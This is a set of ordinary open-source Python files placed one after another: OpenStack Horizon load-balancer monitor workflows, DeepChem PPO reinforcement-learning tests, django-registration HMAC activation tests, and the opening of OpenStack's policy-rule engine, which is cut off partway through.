        values = {attr: getattr(monitor, attr) for attr in attrs}
        return template % values
class AddPMAssociationAction(workflows.Action, MonitorMixin):
    """Workflow action choosing a health monitor to attach to a pool."""
    monitor_id = forms.ChoiceField(label=_("Monitor"))
    def __init__(self, request, *args, **kwargs):
        super(AddPMAssociationAction, self).__init__(request, *args, **kwargs)
    def populate_monitor_id_choices(self, request, context):
        # Offer only monitors not already associated with this pool.
        self.fields['monitor_id'].label = _("Select a monitor template "
                                            "for %s") % context['pool_name']
        monitor_id_choices = [('', _("Select a Monitor"))]
        try:
            tenant_id = self.request.user.tenant_id
            monitors = api.lbaas.pool_health_monitor_list(request,
                                                          tenant_id=tenant_id)
            for m in monitors:
                if m.id not in context['pool_monitors']:
                    display_name = self._get_monitor_display_name(m)
                    monitor_id_choices.append((m.id, display_name))
        except Exception:
            exceptions.handle(request,
                              _('Unable to retrieve monitors list.'))
        self.fields['monitor_id'].choices = monitor_id_choices
        return monitor_id_choices
    class Meta:
        name = _("Association Details")
        permissions = ('openstack.services.network',)
        help_text = _("Associate a health monitor with target pool.")
class AddPMAssociationStep(workflows.Step):
    """Workflow step wiring :class:`AddPMAssociationAction`."""

    action_class = AddPMAssociationAction
    depends_on = ("pool_id", "pool_name", "pool_monitors")
    contributes = ("monitor_id",)

    def contribute(self, data, context):
        """Merge the selected monitor id into the workflow context."""
        context = super(AddPMAssociationStep, self).contribute(data, context)
        # Falls through (returning None) when the form posted no data.
        return context if data else None
class AddPMAssociation(workflows.Workflow):
    """Workflow associating an existing health monitor with a pool."""

    slug = "addassociation"
    name = _("Associate Monitor")
    finalize_button_name = _("Associate")
    success_message = _('Associated monitor.')
    failure_message = _('Unable to associate monitor.')
    success_url = "horizon:project:loadbalancers:index"
    default_steps = (AddPMAssociationStep,)

    def handle(self, request, context):
        """Create the pool/monitor association via the LBaaS API."""
        try:
            result = api.lbaas.pool_monitor_association_create(
                request, **context)
            context['monitor_id'] = result
            return True
        except Exception:
            exceptions.handle(request, _("Unable to associate monitor."))
            return False
class DeletePMAssociationAction(workflows.Action, MonitorMixin):
    """Action selecting an associated monitor to remove from a pool.

    The previous ``__init__`` only delegated to ``super()`` with the
    same arguments, so it has been removed as a useless override.
    """

    monitor_id = forms.ChoiceField(label=_("Monitor"))

    def populate_monitor_id_choices(self, request, context):
        """Return choices for monitors currently associated with the pool.

        Also customizes the field label with the target pool's name.
        """
        self.fields['monitor_id'].label = (_("Select a health monitor of %s") %
                                           context['pool_name'])
        monitor_id_choices = [('', _("Select a Monitor"))]
        try:
            monitors = api.lbaas.pool_health_monitor_list(request)
            for m in monitors:
                # Offer only monitors already attached to the pool.
                if m.id in context['pool_monitors']:
                    display_name = self._get_monitor_display_name(m)
                    monitor_id_choices.append((m.id, display_name))
        except Exception:
            exceptions.handle(request,
                              _('Unable to retrieve monitors list.'))
        self.fields['monitor_id'].choices = monitor_id_choices
        return monitor_id_choices

    class Meta:
        name = _("Association Details")
        permissions = ('openstack.services.network',)
        help_text = _("Disassociate a health monitor from target pool. ")
class DeletePMAssociationStep(workflows.Step):
    """Workflow step wiring :class:`DeletePMAssociationAction`."""

    action_class = DeletePMAssociationAction
    depends_on = ("pool_id", "pool_name", "pool_monitors")
    contributes = ("monitor_id",)

    def contribute(self, data, context):
        """Merge the selected monitor id into the workflow context."""
        context = super(DeletePMAssociationStep, self).contribute(
            data, context)
        # Falls through (returning None) when the form posted no data.
        return context if data else None
class DeletePMAssociation(workflows.Workflow):
    """Workflow removing a monitor association from a pool."""

    slug = "deleteassociation"
    name = _("Disassociate Monitor")
    finalize_button_name = _("Disassociate")
    success_message = _('Disassociated monitor.')
    failure_message = _('Unable to disassociate monitor.')
    success_url = "horizon:project:loadbalancers:index"
    default_steps = (DeletePMAssociationStep,)

    def handle(self, request, context):
        """Delete the pool/monitor association via the LBaaS API."""
        try:
            result = api.lbaas.pool_monitor_association_delete(
                request, **context)
            context['monitor_id'] = result
            return True
        except Exception:
            exceptions.handle(request, _("Unable to disassociate monitor."))
            return False
|
|
import pytest
from flaky import flaky
import deepchem as dc
from deepchem.models.optimizers import Adam, PolynomialDecay
from tensorflow.keras.layers import Input, Dense, GRU, Reshape, Softmax
import numpy as np
import tensorflow as tf
import unittest
class TestPPO(unittest.TestCase):
  """Tests for the Proximal Policy Optimization (PPO) implementation."""
  @flaky
  def test_roulette(self):
    """Test training a policy for the roulette environment."""
    # This is modeled after the Roulette-v0 environment from OpenAI Gym.
    # The player can bet on any number from 0 to 36, or walk away (which ends the
    # game). The average reward for any bet is slightly negative, so the best
    # strategy is to walk away.
    class RouletteEnvironment(dc.rl.Environment):
      def __init__(self):
        # One scalar state component; 38 actions (0-36 plus "walk away").
        super(RouletteEnvironment, self).__init__([(1,)], 38)
        self._state = [np.array([0])]
      def step(self, action):
        if action == 37:
          self._terminated = True  # Walk away.
          return 0.0
        wheel = np.random.randint(37)
        if wheel == 0:
          if action == 0:
            return 35.0  # Hitting 0 pays 35:1.
          return -1.0
        # Even/odd parity bets (action != 0) pay 1:1.
        if action != 0 and wheel % 2 == action % 2:
          return 1.0
        return -1.0
      def reset(self):
        self._terminated = False
    env = RouletteEnvironment()
    # This policy just learns a constant probability for each action, and a constant for the value.
    class TestPolicy(dc.rl.Policy):
      def __init__(self):
        super(TestPolicy, self).__init__(['action_prob', 'value'])
      def create_model(self, **kwargs):
        class TestModel(tf.keras.Model):
          def __init__(self):
            super(TestModel, self).__init__(**kwargs)
            self.action = tf.Variable(np.ones(env.n_actions, np.float32))
            # NOTE(review): tf.Variable's second positional argument is
            # `trainable`, not a dtype — passing tf.float32 here is truthy
            # and so leaves the variable trainable; confirm intent.
            self.value = tf.Variable([0.0], tf.float32)
          def call(self, inputs, **kwargs):
            prob = tf.nn.softmax(tf.reshape(self.action, (-1, env.n_actions)))
            return (prob, self.value)
        return TestModel()
    # Optimize it.
    ppo = dc.rl.PPO(
        env,
        TestPolicy(),
        max_rollout_length=20,
        optimizer=Adam(learning_rate=0.003))
    ppo.fit(80000)
    # It should have learned that the expected value is very close to zero, and that the best
    # action is to walk away.
    action_prob, value = ppo.predict([[0]])
    assert -0.8 < value[0] < 0.5
    assert action_prob.argmax() == 37
    assert ppo.select_action([[0]], deterministic=True) == 37
    # Verify that we can create a new PPO object, reload the parameters from the first one, and
    # get the same result.
    new_ppo = dc.rl.PPO(env, TestPolicy(), model_dir=ppo._model.model_dir)
    new_ppo.restore()
    action_prob2, value2 = new_ppo.predict([[0]])
    assert value2 == value
    # Do the same thing, only using the "restore" argument to fit().
    new_ppo = dc.rl.PPO(env, TestPolicy(), model_dir=ppo._model.model_dir)
    new_ppo.fit(0, restore=True)
    action_prob2, value2 = new_ppo.predict([[0]])
    assert value2 == value
  def test_recurrent_states(self):
    """Test a policy that involves recurrent layers."""
    # The environment just has a constant state.
    class TestEnvironment(dc.rl.Environment):
      def __init__(self):
        super(TestEnvironment, self).__init__((10,), 10)
        self._state = np.random.random(10).astype(np.float32)
      def step(self, action):
        self._state = np.random.random(10).astype(np.float32)
        return 0.0
      def reset(self):
        pass
    # The policy includes a single recurrent layer.
    class TestPolicy(dc.rl.Policy):
      def __init__(self):
        # The third output is the recurrent state, initialized to zeros.
        super(TestPolicy, self).__init__(['action_prob', 'value', 'rnn_state'],
                                         [np.zeros(10)])
      def create_model(self, **kwargs):
        state = Input(shape=(10,))
        rnn_state = Input(shape=(10,))
        reshaped = Reshape((1, 10))(state)
        gru, rnn_final_state = GRU(
            10, return_state=True, return_sequences=True, time_major=True)(
                reshaped, initial_state=rnn_state)
        output = Softmax()(Reshape((10,))(gru))
        value = dc.models.layers.Variable([0.0])([state])
        return tf.keras.Model(
            inputs=[state, rnn_state], outputs=[output, value, rnn_final_state])
    # We don't care about actually optimizing it, so just run a few rollouts to make
    # sure fit() doesn't crash, then check the behavior of the GRU state.
    env = TestEnvironment()
    ppo = dc.rl.PPO(env, TestPolicy(), batch_size=0)
    ppo.fit(100)
    # On the first call, the initial state should be all zeros.
    prob1, value1 = ppo.predict(
        env.state, use_saved_states=True, save_states=False)
    # It should still be zeros since we didn't save it last time.
    prob2, value2 = ppo.predict(
        env.state, use_saved_states=True, save_states=True)
    # It should be different now.
    prob3, value3 = ppo.predict(
        env.state, use_saved_states=True, save_states=False)
    # This should be the same as the previous one.
    prob4, value4 = ppo.predict(
        env.state, use_saved_states=True, save_states=False)
    # Now we reset it, so we should get the same result as initially.
    prob5, value5 = ppo.predict(
        env.state, use_saved_states=False, save_states=True)
    assert np.array_equal(prob1, prob2)
    assert np.array_equal(prob1, prob5)
    assert np.array_equal(prob3, prob4)
    assert not np.array_equal(prob2, prob3)
  @pytest.mark.slow
  def test_hindsight(self):
    """Test Hindsight Experience Replay."""
    # The environment is a plane in which the agent moves by steps until it reaches a randomly
    # positioned goal. No reward is given until it reaches the goal. That makes it very hard
    # to learn by standard methods, since it may take a very long time to receive any feedback
    # at all. Using hindsight makes it much easier.
    class TestEnvironment(dc.rl.Environment):
      def __init__(self):
        # State is (x, y, goal_x, goal_y); four movement actions.
        super(TestEnvironment, self).__init__((4,), 4)
        self.moves = [(-1, 0), (1, 0), (0, -1), (0, 1)]
      def reset(self):
        self._state = np.concatenate([[0, 0], np.random.randint(-50, 50, 2)])
        self._terminated = False
        self.count = 0
      def step(self, action):
        new_state = self._state.copy()
        new_state[:2] += self.moves[action]
        self._state = new_state
        self.count += 1
        reward = 0
        if np.array_equal(new_state[:2], new_state[2:]):
          self._terminated = True
          reward = 1
        elif self.count == 1000:
          # Give up after 1000 steps so episodes always terminate.
          self._terminated = True
        return reward
      def apply_hindsight(self, states, actions, goal):
        # Rewrite the trajectory as if the final position had been the goal.
        new_states = []
        rewards = []
        goal_pos = goal[:2]
        for state, action in zip(states, actions):
          new_state = state.copy()
          new_state[2:] = goal_pos
          new_states.append(new_state)
          pos_after_action = new_state[:2] + self.moves[action]
          if np.array_equal(pos_after_action, goal_pos):
            rewards.append(1)
            break
          else:
            rewards.append(0)
        return new_states, rewards
    # A simple policy with two hidden layers.
    class TestPolicy(dc.rl.Policy):
      def __init__(self):
        super(TestPolicy, self).__init__(['action_prob', 'value'])
      def create_model(self, **kwargs):
        state = Input(shape=(4,))
        dense1 = Dense(8, activation=tf.nn.relu)(state)
        dense2 = Dense(8, activation=tf.nn.relu)(dense1)
        output = Dense(4, activation=tf.nn.softmax, use_bias=False)(dense2)
        value = Dense(1)(dense2)
        return tf.keras.Model(inputs=state, outputs=[output, value])
    # Optimize it.
    env = TestEnvironment()
    # NOTE(review): this PolynomialDecay schedule is built but never passed
    # to the optimizer below (Adam uses a fixed 0.001) — confirm intent.
    learning_rate = PolynomialDecay(
        initial_rate=0.0001, final_rate=0.00005, decay_steps=1500000)
    ppo = dc.rl.PPO(
        env,
        TestPolicy(),
        use_hindsight=True,
        optimization_epochs=1,
        batch_size=0,
        optimizer=Adam(learning_rate=0.001))
    ppo.fit(1500000)
    # Try running it a few times and see if it succeeds.
    pass_count = 0
    for i in range(5):
      env.reset()
      while not env.terminated:
        env.step(ppo.select_action(env.state))
      if np.array_equal(env.state[:2], env.state[2:]):
        pass_count += 1
    assert pass_count >= 3
|
|
"""
Tests for the HMAC signed-token registration workflow.
"""
import datetime
import time
from django.conf import settings
from django.core import signing
from django.core.urlresolvers import reverse
from django.http import HttpRequest
from django.test import modify_settings, override_settings
from .. import signals
from registration.backends.hmac.views import REGISTRATION_SALT
from .base import ActivationTestCase
@modify_settings(INSTALLED_APPS={'remove': 'registration'})
@override_settings(ROOT_URLCONF='registration.backends.hmac.urls')
class HMACViewTests(ActivationTestCase):
    """
    Tests for the signed-token registration workflow.
    """
    def test_activation(self):
        """
        Activation of an account functions properly.
        """
        resp = self.client.post(
            reverse('registration_register'),
            data=self.valid_data
        )
        # Recreate the activation key the backend would have emailed:
        # the username signed with the registration salt.
        activation_key = signing.dumps(
            obj=self.valid_data[self.user_model.USERNAME_FIELD],
            salt=REGISTRATION_SALT
        )
        with self.assertSignalSent(signals.user_activated):
            resp = self.client.get(
                reverse(
                    'registration_activate',
                    args=(),
                    kwargs={'activation_key': activation_key}
                )
            )
        self.assertRedirects(resp, reverse('registration_activation_complete'))
    def test_repeat_activation(self):
        """
        Once activated, attempting to re-activate an account (even
        with a valid key) does nothing.
        """
        resp = self.client.post(
            reverse('registration_register'),
            data=self.valid_data
        )
        activation_key = signing.dumps(
            obj=self.valid_data[self.user_model.USERNAME_FIELD],
            salt=REGISTRATION_SALT
        )
        with self.assertSignalSent(signals.user_activated):
            resp = self.client.get(
                reverse(
                    'registration_activate',
                    args=(),
                    kwargs={'activation_key': activation_key}
                )
            )
        # First activation redirects to success.
        self.assertRedirects(resp, reverse('registration_activation_complete'))
        with self.assertSignalNotSent(signals.user_activated):
            resp = self.client.get(
                reverse(
                    'registration_activate',
                    args=(),
                    kwargs={'activation_key': activation_key}
                )
            )
        # Second activation fails: the activate template is re-rendered
        # with a 200 rather than redirecting to the success view.
        self.assertEqual(200, resp.status_code)
        self.assertTemplateUsed(resp, 'registration/activate.html')
    # The timestamp calculation will error if USE_TZ=True, due to
    # trying to subtract a naive from an aware datetime. Since time
    # zones aren't relevant to the test, we just temporarily disable
    # time-zone support rather than do the more complex dance of
    # checking the setting and forcing everything to naive or aware.
    @override_settings(USE_TZ=False)
    def test_activation_expired(self):
        """
        An expired account can't be activated.
        """
        self.client.post(
            reverse('registration_register'),
            data=self.valid_data
        )
        # We need to create an activation key valid for the username,
        # but with a timestamp > ACCOUNT_ACTIVATION_DAYS days in the
        # past. This requires monkeypatching time.time() to return
        # that timestamp, since TimestampSigner uses time.time().
        #
        # On Python 3.3+ this is much easier because of the
        # timestamp() method of datetime objects, but since
        # django-registration has to run on Python 2.7, we manually
        # calculate it using a timedelta between the signup date and
        # the UNIX epoch, and patch time.time() temporarily to return
        # a date (ACCOUNT_ACTIVATION_DAYS + 1) days in the past.
        user = self.user_model.objects.get(**self.user_lookup_kwargs)
        joined_timestamp = (
            user.date_joined - datetime.datetime.fromtimestamp(0)
        ).total_seconds()
        expired_timestamp = (
            joined_timestamp - (settings.ACCOUNT_ACTIVATION_DAYS + 1) * 86400
        )
        _old_time = time.time
        try:
            # Patch time.time() only while signing, then restore it.
            time.time = lambda: expired_timestamp
            activation_key = signing.dumps(
                obj=self.valid_data[self.user_model.USERNAME_FIELD],
                salt=REGISTRATION_SALT
            )
        finally:
            time.time = _old_time
        with self.assertSignalNotSent(signals.user_activated):
            resp = self.client.get(
                reverse(
                    'registration_activate',
                    args=(),
                    kwargs={'activation_key': activation_key}
                )
            )
        self.assertEqual(200, resp.status_code)
        self.assertTemplateUsed(resp, 'registration/activate.html')
    def test_nonexistent_activation(self):
        """
        A nonexistent username in an activation key will fail to
        activate.
        """
        activation_key = signing.dumps(
            obj='parrot',
            salt=REGISTRATION_SALT
        )
        with self.assertSignalNotSent(signals.user_activated):
            resp = self.client.get(
                reverse(
                    'registration_activate',
                    args=(),
                    kwargs={'activation_key': activation_key}
                )
            )
        self.assertEqual(200, resp.status_code)
        self.assertTemplateUsed(resp, 'registration/activate.html')
    def test_activation_signal(self):
        """
        The ``user_activated`` signal fires with the activated user and
        the triggering request.
        """
        self.client.post(
            reverse('registration_register'),
            data=self.valid_data
        )
        activation_key = signing.dumps(
            obj=self.valid_data[self.user_model.USERNAME_FIELD],
            salt=REGISTRATION_SALT
        )
        with self.assertSignalSent(signals.user_activated,
                                   required_kwargs=['user', 'request']) as cm:
            self.client.get(
                reverse(
                    'registration_activate',
                    args=(),
                    kwargs={'activation_key': activation_key}
                )
            )
        self.assertEqual(
            getattr(cm.received_kwargs['user'],
                    self.user_model.USERNAME_FIELD),
            self.valid_data[self.user_model.USERNAME_FIELD]
        )
        self.assertTrue(
            isinstance(cm.received_kwargs['request'], HttpRequest)
        )
|
|
# Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Common Policy Engine Implementation
Policies can be expressed in one of two forms: A list of lists, or a
string written in the new policy language.
In the list-of-lists representation, each check inside the innermost
list is combined as with an "and" conjunction--for that check to pass,
all the specified checks must pass. These innermost lists are then
combined as with an "or" conjunction. This is the original way of
expressing policies, but there now exists a new way: the policy
language.
In the policy language, each check is specified the same way as in the
list-of-lists representation: a simple "a:b" pair that is matched to
the correct code to perform that check. However, conjunction
operators are available, allowing for more expressiveness in crafting
policies.
As an example, take the following rule, expressed in the list-of-lists
representation::
[["role:admin"], ["project_id:%(project_id)s", "role:projectadmin"]]
In the policy language, this becomes::
role:admin or (project_id:%(project_id)s and role:projectadmin)
The policy language also has the "not" operator, allowing a richer
policy rule::
project_id:%(project_id)s and not role:dunce
Finally, two special policy checks should be mentioned; the policy
check "@" will always accept an access, and the policy check "!" will
always reject an access. (Note that if a rule is either the empty
list ("[]") or the empty string, this is equivalent to the "@" policy
check.) Of these, the "!" policy check is probably the most useful,
as it allows particular rules to be explicitly disabled.
"""
import abc
import ast
import re
from oslo.config import cfg
import six
import six.moves.urllib.parse as urlparse
import six.moves.urllib.request as urlrequest
from keystone.openstack.common import fileutils
from keystone.openstack.common.gettextutils import _
from keystone.openstack.common import jsonutils
from keystone.openstack.common import log as logging
# Configuration options: which JSON policy file to load and which rule
# to fall back on when a requested rule is not found.
policy_opts = [
    cfg.StrOpt('policy_file',
               default='policy.json',
               help=_('JSON file containing policy')),
    cfg.StrOpt('policy_default_rule',
               default='default',
               help=_('Rule enforced when requested rule is not found')),
]
CONF = cfg.CONF
CONF.register_opts(policy_opts)
LOG = logging.getLogger(__name__)
# Registry of check kinds (the text before ':' in a rule) to check
# factories; a None key, if present, is used as the generic fallback
# (see _parse_check). Populated elsewhere in this module.
_checks = {}
class PolicyNotAuthorized(Exception):
    """Raised when a policy rule rejects the requested action."""

    def __init__(self, rule):
        # Embed the offending rule in the exception message.
        super(PolicyNotAuthorized, self).__init__(
            _("Policy doesn't allow %s to be performed.") % rule)
class Rules(dict):
    """A store for rules. Handles the default_rule setting directly."""
    @classmethod
    def load_json(cls, data, default_rule=None):
        """Allow loading of JSON rule data.

        Parses each rule string/list with parse_rule (defined elsewhere
        in this module) and returns a populated Rules instance.
        """
        # Suck in the JSON data and parse the rules
        rules = dict((k, parse_rule(v)) for k, v in
                     jsonutils.loads(data).items())
        return cls(rules, default_rule)
    def __init__(self, rules=None, default_rule=None):
        """Initialize the Rules store."""
        super(Rules, self).__init__(rules or {})
        self.default_rule = default_rule
    def __missing__(self, key):
        """Implements the default rule handling."""
        # A dict-valued default rule disables defaulting entirely.
        if isinstance(self.default_rule, dict):
            raise KeyError(key)
        # If the default rule isn't actually defined, do something
        # reasonably intelligent
        if not self.default_rule:
            raise KeyError(key)
        # A pre-parsed check object can be returned directly.
        if isinstance(self.default_rule, BaseCheck):
            return self.default_rule
        # We need to check this or we can get infinite recursion
        if self.default_rule not in self:
            raise KeyError(key)
        elif isinstance(self.default_rule, six.string_types):
            return self[self.default_rule]
        # NOTE(review): a default_rule that is present in the mapping but
        # is neither a BaseCheck nor a string falls through here and
        # implicitly returns None — confirm this is intended.
    def __str__(self):
        """Dumps a string representation of the rules."""
        # Start by building the canonical strings for the rules
        out_rules = {}
        for key, value in self.items():
            # Use empty string for singleton TrueCheck instances
            if isinstance(value, TrueCheck):
                out_rules[key] = ''
            else:
                out_rules[key] = str(value)
        # Dump a pretty-printed JSON representation
        return jsonutils.dumps(out_rules, indent=4)
class Enforcer(object):
    """Responsible for loading and enforcing rules.

    :param policy_file: Custom policy file to use, if none is
                        specified, `CONF.policy_file` will be
                        used.
    :param rules: Default dictionary / Rules to use. It will be
                  considered just in the first instantiation. If
                  `load_rules(True)`, `clear()` or `set_rules(True)`
                  is called this will be overwritten.
    :param default_rule: Default rule to use, CONF.default_rule will
                         be used if none is specified.
    """
    def __init__(self, policy_file=None, rules=None, default_rule=None):
        self.rules = Rules(rules, default_rule)
        self.default_rule = default_rule or CONF.policy_default_rule
        # Resolved lazily on first load_rules() call.
        self.policy_path = None
        self.policy_file = policy_file or CONF.policy_file
    def set_rules(self, rules, overwrite=True):
        """Create a new Rules object based on the provided dict of rules.

        :param rules: New rules to use. It should be an instance of dict.
        :param overwrite: Whether to overwrite current rules or update them
                          with the new rules.
        """
        if not isinstance(rules, dict):
            raise TypeError(_("Rules must be an instance of dict or Rules, "
                            "got %s instead") % type(rules))
        if overwrite:
            self.rules = Rules(rules, self.default_rule)
        else:
            self.rules.update(rules)
    def clear(self):
        """Clears Enforcer rules, policy's cache and policy's path."""
        self.set_rules({})
        self.default_rule = None
        self.policy_path = None
    def load_rules(self, force_reload=False):
        """Loads policy_path's rules.

        Policy file is cached and will be reloaded if modified.

        :param force_reload: Whether to overwrite current rules.
        """
        if not self.policy_path:
            self.policy_path = self._get_policy_path()
        # read_cached_file only re-reads when the file's mtime changed
        # (or when force_reload is set).
        reloaded, data = fileutils.read_cached_file(self.policy_path,
                                                    force_reload=force_reload)
        if reloaded or not self.rules:
            rules = Rules.load_json(data, self.default_rule)
            self.set_rules(rules)
            LOG.debug(_("Rules successfully reloaded"))
    def _get_policy_path(self):
        """Locate the policy json data file.

        :param policy_file: Custom policy file to locate.
        :returns: The policy path
        :raises: ConfigFilesNotFoundError if the file couldn't
                 be located.
        """
        policy_file = CONF.find_file(self.policy_file)
        if policy_file:
            return policy_file
        raise cfg.ConfigFilesNotFoundError((self.policy_file,))
    def enforce(self, rule, target, creds, do_raise=False,
                exc=None, *args, **kwargs):
        """Checks authorization of a rule against the target and credentials.

        :param rule: A string or BaseCheck instance specifying the rule
                     to evaluate.
        :param target: As much information about the object being operated
                       on as possible, as a dictionary.
        :param creds: As much information about the user performing the
                      action as possible, as a dictionary.
        :param do_raise: Whether to raise an exception or not if check
                         fails.
        :param exc: Class of the exception to raise if the check fails.
                    Any remaining arguments passed to check() (both
                    positional and keyword arguments) will be passed to
                    the exception class. If not specified, PolicyNotAuthorized
                    will be used.
        :return: Returns False if the policy does not allow the action and
                 exc is not provided; otherwise, returns a value that
                 evaluates to True. Note: for rules using the "case"
                 expression, this True value will be the specified string
                 from the expression.
        """
        # NOTE(flaper87): Not logging target or creds to avoid
        # potential security issues.
        LOG.debug(_("Rule %s will be now enforced") % rule)
        self.load_rules()
        # Allow the rule to be a Check tree
        if isinstance(rule, BaseCheck):
            result = rule(target, creds, self)
        elif not self.rules:
            # No rules to reference means we're going to fail closed
            result = False
        else:
            try:
                # Evaluate the rule
                result = self.rules[rule](target, creds, self)
            except KeyError:
                LOG.debug(_("Rule [%s] doesn't exist") % rule)
                # If the rule doesn't exist, fail closed
                result = False
        # If it is False, raise the exception if requested
        if do_raise and not result:
            if exc:
                raise exc(*args, **kwargs)
            raise PolicyNotAuthorized(rule)
        return result
@six.add_metaclass(abc.ABCMeta)
class BaseCheck(object):
    """Abstract base class for Check classes."""

    @abc.abstractmethod
    def __call__(self, target, cred, enforcer):
        """Perform the check when the instance is called.

        Return False to reject the access, or any truthy value (not
        necessarily True) to accept it.
        """
        pass

    @abc.abstractmethod
    def __str__(self):
        """Render the Check tree rooted at this node as a string."""
        pass
class FalseCheck(BaseCheck):
    """A policy check that always returns False (disallow)."""

    def __str__(self):
        """Render the canonical "!" representation."""
        return "!"

    def __call__(self, target, cred, enforcer):
        """Deny the access unconditionally."""
        return False
class TrueCheck(BaseCheck):
    """A policy check that always returns True (allow)."""

    def __str__(self):
        """Render the canonical "@" representation."""
        return "@"

    def __call__(self, target, cred, enforcer):
        """Accept the access unconditionally."""
        return True
class Check(BaseCheck):
    """A base class to allow for user-defined policy checks."""

    def __init__(self, kind, match):
        """Store the two halves of a "kind:match" check.

        :param kind: The kind of the check, i.e., the field before ':'.
        :param match: The match of the check, i.e., the field after ':'.
        """
        self.kind = kind
        self.match = match

    def __str__(self):
        """Render back to the "kind:match" form."""
        return "{0}:{1}".format(self.kind, self.match)
class NotCheck(BaseCheck):
    """Implements the "not" logical operator.

    A policy check that inverts the result of another policy check.
    """

    def __init__(self, rule):
        """Wrap *rule*, whose result will be negated.

        :param rule: The rule to negate. Must be a Check.
        """
        self.rule = rule

    def __str__(self):
        """Render as "not <rule>"."""
        return "not %s" % self.rule

    def __call__(self, target, cred, enforcer):
        """Return the logical inverse of the wrapped check."""
        inner = self.rule(target, cred, enforcer)
        return not inner
class AndCheck(BaseCheck):
    """Implements the "and" logical operator.

    A policy check that requires that a list of other checks all return True.
    """

    def __init__(self, rules):
        """Store the sub-rules to be conjoined.

        :param rules: A list of rules that will be tested.
        """
        self.rules = rules

    def __str__(self):
        """Render as a parenthesized "and" expression."""
        return "(%s)" % ' and '.join(str(r) for r in self.rules)

    def __call__(self, target, cred, enforcer):
        """Accept only if every sub-rule accepts (short-circuits)."""
        return all(rule(target, cred, enforcer) for rule in self.rules)

    def add_check(self, rule):
        """Append *rule* to the conjunction; returns self for chaining."""
        self.rules.append(rule)
        return self
class OrCheck(BaseCheck):
    """Implements the "or" operator.

    A policy check that requires that at least one of a list of other
    checks returns True.
    """

    def __init__(self, rules):
        """Store the sub-rules to be disjoined.

        :param rules: A list of rules that will be tested.
        """
        self.rules = rules

    def __str__(self):
        """Render as a parenthesized "or" expression."""
        return "(%s)" % ' or '.join(str(r) for r in self.rules)

    def __call__(self, target, cred, enforcer):
        """Accept if any sub-rule accepts (short-circuits)."""
        return any(rule(target, cred, enforcer) for rule in self.rules)

    def add_check(self, rule):
        """Append *rule* to the disjunction; returns self for chaining."""
        self.rules.append(rule)
        return self
def _parse_check(rule):
    """Parse a single base check rule into an appropriate Check object."""
    # The two one-character special rules: "!" always denies, "@" always
    # allows.
    if rule == '!':
        return FalseCheck()
    if rule == '@':
        return TrueCheck()
    # Everything else must be of the form "kind:match".
    try:
        kind, match = rule.split(':', 1)
    except Exception:
        LOG.exception(_("Failed to understand rule %s") % rule)
        # If the rule is invalid, we'll fail closed
        return FalseCheck()
    # Dispatch to a registered handler; the None entry, when present,
    # acts as the generic fallback.
    handler = _checks.get(kind, _checks.get(None))
    if handler is not None:
        return handler(kind, match)
    LOG.error(_("No handler for matches of kind %s") % kind)
    return FalseCheck()
def _parse_list_rule(rule):
    """Translates the old list-of-lists syntax into a tree of Check objects.

    Provided for backwards compatibility.
    """
    # An empty rule defaults to an unconditional accept.
    if not rule:
        return TrueCheck()
    # Outer list entries are OR-ed together; members of each inner list
    # are AND-ed together.
    or_list = []
    for inner_rule in rule:
        if not inner_rule:
            # Elide empty inner lists.
            continue
        if isinstance(inner_rule, six.string_types):
            # Promote a bare string to a one-element list.
            inner_rule = [inner_rule]
        and_list = [_parse_check(r) for r in inner_rule]
        # A single check needs no AndCheck wrapper.
        or_list.append(and_list[0] if len(and_list) == 1
                       else AndCheck(and_list))
    # With no surviving entries, fail closed; with one, skip the OrCheck.
    if not or_list:
        return FalseCheck()
    if len(or_list) == 1:
        return or_list[0]
    return OrCheck(or_list)
# Used for tokenizing the policy language (split on runs of whitespace)
_tokenize_re = re.compile(r'\s+')
def _parse_tokenize(rule):
    """Tokenizer for the policy language.

    Most of the single-character tokens are specified in the
    _tokenize_re; however, parentheses need to be handled specially,
    because they can appear inside a check string. Thankfully, those
    parentheses that appear inside a check string can never occur at
    the very beginning or end ("%(variable)s" is the correct syntax).

    Yields (token_kind, value) pairs: '(' / ')', 'and' / 'or' / 'not',
    'string' for quoted literals, and 'check' for parsed Check objects.
    """
    for tok in _tokenize_re.split(rule):
        # Skip empty tokens
        if not tok or tok.isspace():
            continue
        # Handle leading parens on the token
        clean = tok.lstrip('(')
        for i in range(len(tok) - len(clean)):
            yield '(', '('
        # If it was only parentheses, continue
        if not clean:
            continue
        else:
            tok = clean
        # Handle trailing parens on the token; they are stripped from
        # `clean` but only *counted* here — the ')' tokens are yielded
        # after the main token below.
        clean = tok.rstrip(')')
        trail = len(tok) - len(clean)
        # Yield the cleaned token
        lowered = clean.lower()
        if lowered in ('and', 'or', 'not'):
            # Special tokens
            yield lowered, clean
        elif clean:
            # Not a special token, but not composed solely of ')'
            # NOTE: the quote test deliberately inspects `tok` (which may
            # still carry trailing parens), not `clean`.
            if len(tok) >= 2 and ((tok[0], tok[-1]) in
                                  [('"', '"'), ("'", "'")]):
                # It's a quoted string
                yield 'string', tok[1:-1]
            else:
                yield 'check', _parse_check(clean)
        # Yield the trailing parens
        for i in range(trail):
            yield ')', ')'
class ParseStateMeta(type):
    """Metaclass for the ParseState class.

    Facilitates identifying reduction methods.
    """

    def __new__(mcs, name, bases, cls_dict):
        """Create the class.

        Injects 'reducers': a list of (token_sequence, method_name)
        tuples collected from every method carrying a 'reducers'
        attribute (set by the @reducer decorator).
        """
        cls_dict['reducers'] = [
            (reduction, key)
            for key, value in cls_dict.items()
            if hasattr(value, 'reducers')
            for reduction in value.reducers
        ]
        return super(ParseStateMeta, mcs).__new__(mcs, name, bases, cls_dict)
def reducer(*tokens):
    """Decorator for reduction methods.

    Arguments are a sequence of tokens, in order, which should trigger
    running this reduction method.
    """
    def decorator(func):
        # Accumulate token sequences on the function object itself,
        # creating the list on first decoration.
        sequences = getattr(func, 'reducers', None)
        if sequences is None:
            sequences = func.reducers = []
        sequences.append(list(tokens))
        return func
    return decorator
@six.add_metaclass(ParseStateMeta)
class ParseState(object):
    """Implement the core of parsing the policy language.

    Uses a greedy reduction algorithm to reduce a sequence of tokens into
    a single terminal, the value of which will be the root of the Check tree.

